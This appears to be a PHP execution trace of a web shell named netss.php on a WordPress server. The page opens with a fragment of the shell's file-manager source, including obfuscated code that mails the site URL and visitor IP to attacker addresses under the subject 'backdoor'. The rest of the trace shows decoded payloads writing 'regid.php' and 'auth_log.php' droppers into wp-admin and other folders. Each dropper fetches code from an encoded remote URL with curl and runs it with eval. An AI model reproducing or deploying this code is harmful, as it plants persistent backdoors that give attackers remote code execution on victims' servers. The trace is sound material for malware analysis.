. $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td>-</td>\';\n echo \'<td><a href="javascript:void(0);" onclick="dels(\\\'\' . $name . \'\\\');">Del</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $dnum++;\n }\n foreach ($array[\'file\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n $size = size(filesize($path));\n echo \'<tr>\';\n echo \'<td><input type="checkbox" name="files[]" value="\' . $name . \'"><a href="javascript:void(0);" onclick="go(\\\'edit\\\',\\\'\' . $name . \'\\\');">\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</a></td>\';\n echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' . $prem . \'\\\',\\\'pd\\\',\\\'\' . $name . \'\\\');">\' . $prem . \'</a></td>\';\n echo \'<td>\' . $ctime . \'</td>\';\n echo \'<td>\' . $mtime . \'</td>\';\n echo \'<td align="right"><a href="javascript:void(0);" onclick="go(\\\'down\\\',\\\'\' . $name . \'\\\');">\' . $size . \'</a></td>\';\n echo \'<td><a target="_blank" href="\' . $thisurl . $name . \'">View</a> \';\n echo \' | <a href="javascript:void(0);" onclick="acts(\\\'\' . $name . \'\\\',\\\'rf\\\',\\\'\' . $name . \'\\\');">Ren</a></td>\';\n echo \'</tr>\';\n $fnum++;\n }\n }\n unset($array);\n echo \'</table>\';\n echo \'<div class="actall" style="text-align:left;">\';\n echo \'<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> \';\n echo \'<input type="button" value="Copy" style="width:50px;" onclick=\\\'txts("Copy path","\' . $nowdir . \'","a");\\\'> \';\n echo \'<input type="button" value="Delete" style="width:50px;" onclick=\\\'dels("b");\\\'> \';\n echo \'<input type="button" value="Perm" style="width:50px;" onclick=\\\'txts("Change Permission","0666","c");\\\'> \';\n echo \'<input type="button" value="Time" style="width:50px;" onclick=\\\'txts("Change the time","\' . $mtime . \'","d");\\\'> \';\n echo \'Total dir[\' . $dnum . \'] - Total file[\' . $fnum . \'] - Permission[\' . $chmod . \']</div></form>\';\n break;\n}\n?>\n<div class="footag"><?php \necho php_uname() . \'<br>\' . $_SERVER[\'SERVER_SOFTWARE\'];\n?>\n</div></div></div></body></html><?php ${"\\x47\\x4cO\\x42\\x41\\x4c\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]="t\\x75j\\x75a\\x6em\\x61i\\x6c";${"\\x47L\\x4fB\\x41\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]="x\\x5fp\\x61\\x74h";${"\\x47L\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]="_\\x53E\\x52\\x56\\x45R";${"G\\x4cO\\x42\\x41\\x4c\\x53"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]="p\\x65\\x73\\x61n\\x5fa\\x6c\\x65r\\x74";@ini_set(\'output_buffering\',0);@ini_set(\'display_errors\',0);set_time_limit(0);ini_set(\'memory_limit\',\'64M\');header(\'Content-Type: text/html; charset=UTF-8\');${${"G\\x4cO\\x42A\\x4cS"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]}="l\\x6fg\\x6ed\\x61s\\x6du\\x40g\\x6da\\x69\\x6c.\\x63\\x6fm\\x2c\\x20n\\x64a\\x73\\x6d\\x75\\x77\\x68y\\x40y\\x61\\x68o\\x6f.\\x63\\x6f\\x6d";${${"G\\x4cO\\x42A\\x4cS"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}="\\x68t\\x74p\\x3a/\\x2f".${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'SERVER_NAME\'].${${"\\x47\\x4c\\x4f\\x42A\\x4cS"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REQUEST_URI\'];${${"\\x47L\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]}="\\x66\\x69\\x78\\x20${${"\\x47\\x4cO\\x42\\x41L\\x53"}["q\\x6f\\x64p\\x78\\x6fe\\x7a\\x5f\\x5fj\\x6b\\x66\\x6f\\x6bm\\x6az\\x63\\x79"]}\\x20\\x3a\\x70\\x20\\x2a\\x49\\x50\\x20\\x41\\x64\\x64\\x72\\x65\\x73\\x73\\x20\\x3a\\x20\\x5b\\x20".${${"G\\x4c\\x4fB\\x41\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']."\\x20\\x5d";mail(${${"G\\x4c\\x4f\\x42\\x41L\\x53"}["\\x62t\\x75\\x6a\\x75k\\x5fc\\x6e\\x65y\\x6d\\x66v\\x72\\x6a\\x67e\\x70x\\x68m\\x74\\x79\\x73\\x61t\\x69k"]},"backdoor",${${"G\\x4c\\x4fB\\x41\\x4cS"}["j\\x79s\\x63u\\x5f\\x63\\x6bq\\x69i\\x68g\\x6bd\\x5fe\\x76w\\x69a"]},"[ ".${${"\\x47\\x4c\\x4f\\x42A\\x4c\\x53"}["h\\x63_\\x66\\x6fn\\x76\\x77\\x63t\\x71_\\x75\\x77t\\x64\\x62a\\x6e\\x63_\\x5fv\\x73g\\x7ao\\x67u\\x74\\x76a\\x67t\\x61n"]}[\'REMOTE_ADDR\']." \\x5d"); ?>\n<?php \nunset($array);\n' /var/www/html/uploads/netss.php 1 0
3 12 0 0.136606 970368 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'YXV0aF9sb2cucGhw'
3 12 1 0.136629 970448
3 12 R 'auth_log.php'
3 13 0 0.136645 970416 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 13 1 0.136659 970480
3 13 R 'w'
3 14 0 0.136672 970448 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 'auth_log.php' 'w'
3 14 1 0.136725 971088
3 14 R resource(5) of type (stream)
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $qosutldt0666f0acdeed = resource(5) of type (stream)
3 15 0 0.136757 970936 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'PD9waHA='
3 15 1 0.136771 971008
3 15 R '<?php'
3 16 0 0.136785 970976 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(5) of type (stream) '<?php'
3 16 1 0.136809 971040
3 16 R 5
3 17 0 0.136822 970936 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3 17 1 0.136846 971352
3 17 R ' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 18 0 0.136872 971320 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(5) of type (stream) ' $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 18 1 0.136899 971384
3 18 R 222
3 19 0 0.136923 970936 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 resource(5) of type (stream)
3 19 1 0.136941 970536
3 19 R TRUE
3 20 0 0.136956 970504 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+'
3 20 1 0.136982 970984
3 20 R '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $ivxhezkq03c7c0ace395 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 21 0 0.137029 970952 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 21 1 0.137044 971032
3 21 R 'DOCUMENT_ROOT'
3 22 0 0.137059 970952 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWNvbnRlbnQvcmVnaWQucGhw'
3 22 1 0.137074 971040
3 22 R '/wp-content/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $yvpvnwdn0ba4439ee9a4 = '/var/www/html/wp-content/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $qqkgwotq1cb251ec0d56 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 23 0 0.137125 971016 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 23 1 0.137138 971080
3 23 R 'w'
3 24 0 0.137151 971048 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-content/regid.php' 'w'
3 24 1 0.137200 971120
3 24 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $cousnrmc7cef8a734855 = FALSE
3 25 0 0.137226 971016 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 25 1 0.137259 971080
3 25 R FALSE
3 26 0 0.137272 971016 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 26 1 0.137290 971048
3 26 R FALSE
3 27 0 0.137303 971016 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 27 1 0.137317 971096
3 27 R 'DOCUMENT_ROOT'
3 28 0 0.137331 971016 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL3JlZ2lkLnBocA=='
3 28 1 0.137345 971104
3 28 R '/wp-admin/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $iyaeksdve5058a61e226 = '/var/www/html/wp-admin/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $yodndfqd265246eadd25 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 29 0 0.137394 971080 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 29 1 0.137407 971144
3 29 R 'w'
3 30 0 0.137420 971112 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/regid.php' 'w'
3 30 1 0.137450 971184
3 30 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $pfiaytaxfbcd73a3e234 = FALSE
3 31 0 0.137475 971080 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 31 1 0.137503 971144
3 31 R FALSE
3 32 0 0.137516 971080 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 32 1 0.137533 971112
3 32 R FALSE
3 33 0 0.137546 971080 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 33 1 0.137560 971160
3 33 R 'DOCUMENT_ROOT'
3 34 0 0.137574 971080 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA='
3 34 1 0.137588 971176
3 34 R '/wp-admin/css/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $nbjydhey230cb5f15c1d = '/var/www/html/wp-admin/css/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $gpxyytua2a3def174022 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 35 0 0.137639 971144 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 35 1 0.137652 971208
3 35 R 'w'
3 36 0 0.137665 971176 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/css/regid.php' 'w'
3 36 1 0.137693 971248
3 36 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $akmclxsgc55520a111df = FALSE
3 37 0 0.137718 971144 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 37 1 0.137749 971208
3 37 R FALSE
3 38 0 0.137762 971144 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 38 1 0.137780 971176
3 38 R FALSE
3 39 0 0.137792 971144 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 39 1 0.137806 971224
3 39 R 'DOCUMENT_ROOT'
3 40 0 0.137820 971144 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA=='
3 40 1 0.137838 971240
3 40 R '/wp-admin/js/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $zsvtagqw2b4b2dd2d7a2 = '/var/www/html/wp-admin/js/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $jiicqwlm48fa2467e5e6 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 41 0 0.137888 971208 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 41 1 0.137901 971272
3 41 R 'w'
3 42 0 0.137913 971240 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/js/regid.php' 'w'
3 42 1 0.137941 971312
3 42 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $wilbughyfb948f9d309f = FALSE
3 43 0 0.137967 971208 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 43 1 0.137995 971272
3 43 R FALSE
3 44 0 0.138008 971208 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 44 1 0.138025 971240
3 44 R FALSE
3 45 0 0.138038 971208 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 45 1 0.138052 971288
3 45 R 'DOCUMENT_ROOT'
3 46 0 0.138066 971208 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3 46 1 0.138081 971304
3 46 R '/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $bapepjtn2811cd9069a2 = '/var/www/html/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $xfauipebc39223eba07c = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 47 0 0.138132 971272 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 47 1 0.138145 971336
3 47 R 'w'
3 48 0 0.138158 971304 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/regid.php' 'w'
3 48 1 0.138186 971376
3 48 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $rgezynep950ad7f8a5cf = FALSE
3 49 0 0.138211 971272 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 49 1 0.138239 971336
3 49 R FALSE
3 50 0 0.138252 971272 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 50 1 0.138269 971304
3 50 R FALSE
3 51 0 0.138282 971272 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 51 1 0.138296 971352
3 51 R 'DOCUMENT_ROOT'
3 52 0 0.138311 971272 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3JlZ2lkLnBocA=='
3 52 1 0.138324 971352
3 52 R '/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $xureceul40232fd6c8ad = '/var/www/html/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $oakpvexq994a8fc3f93e = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 53 0 0.138372 971320 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 53 1 0.138384 971384
3 53 R 'w'
3 54 0 0.138397 971352 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/regid.php' 'w'
3 54 1 0.138430 971888
3 54 R resource(6) of type (stream)
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $zlpoupzt5294fd239614 = resource(6) of type (stream)
3 55 0 0.138460 971784 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 resource(6) of type (stream) '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 55 1 0.138488 971848
3 55 R 273
3 56 0 0.138502 971784 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 resource(6) of type (stream)
3 56 1 0.138517 971376
3 56 R TRUE
3 57 0 0.138530 971344 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 57 1 0.138544 971424
3 57 R 'DOCUMENT_ROOT'
3 58 0 0.138558 971344 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L2luZGV4LnBocA=='
3 58 1 0.138574 971440
3 58 R '/wp-admin/maint/index.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $prmotqdj3935cc34bef5 = '/var/www/html/wp-admin/maint/index.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $rtprfsmu3460f771bb99 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 59 0 0.138630 971408 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 59 1 0.138644 971472
3 59 R 'w'
3 60 0 0.138657 971440 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/index.php' 'w'
3 60 1 0.138688 971512
3 60 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $fxiyhlfi40fbeaa2952a = FALSE
3 61 0 0.138713 971408 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 61 1 0.138741 971472
3 61 R FALSE
3 62 0 0.138754 971408 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 62 1 0.138772 971440
3 62 R FALSE
3 63 0 0.138785 971408 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'RE9DVU1FTlRfUk9PVA=='
3 63 1 0.138799 971488
3 63 R 'DOCUMENT_ROOT'
3 64 0 0.138813 971408 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA=='
3 64 1 0.138828 971504
3 64 R '/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $mbjpypwb7b20acdddd89 = '/var/www/html/wp-admin/maint/regid.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $ytdsowai3effc6913c18 = '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 65 0 0.138878 971472 base64_decode 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 'dw=='
3 65 1 0.138891 971536
3 65 R 'w'
3 66 0 0.138904 971504 fopen 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 '/var/www/html/wp-admin/maint/regid.php' 'w'
3 66 1 0.138932 971576
3 66 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 1 $uwadmcgaf32639c3fc76 = FALSE
3 67 0 0.138957 971472 fwrite 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 2 FALSE '<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?>'
3 67 1 0.138985 971536
3 67 R FALSE
3 68 0 0.138998 971472 fclose 0 /var/www/html/uploads/netss.php(1) : eval()'d code 1 1 FALSE
3 68 1 0.139019 971504
3 68 R FALSE
3 69 0 0.139033 971472 error_reporting 0 /var/www/html/uploads/netss.php(1) : eval()'d code 3 1 1
3 69 1 0.139046 971512
3 69 R 0
3 70 0 0.139059 971472 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 4 2 'display_errors' 'Off'
3 70 1 0.139074 971544
3 70 R ''
